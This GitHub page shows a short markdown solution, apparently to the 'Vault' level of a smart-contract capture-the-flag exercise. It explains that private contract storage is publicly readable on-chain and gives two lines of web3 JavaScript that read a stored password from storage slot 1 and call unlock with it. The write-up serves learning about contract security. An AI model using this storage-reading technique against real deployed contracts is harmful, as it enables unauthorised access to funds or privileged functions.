Skip to content

Latest commit

 

History

History
6 lines (5 loc) · 199 Bytes

8-vault.md

File metadata and controls

6 lines (5 loc) · 199 Bytes

contract memory is present in the blockchain and can be read even if the contract variable isn't public

const password = await web3.eth.getStorageAt(instance, 1);
contract.unlock(password);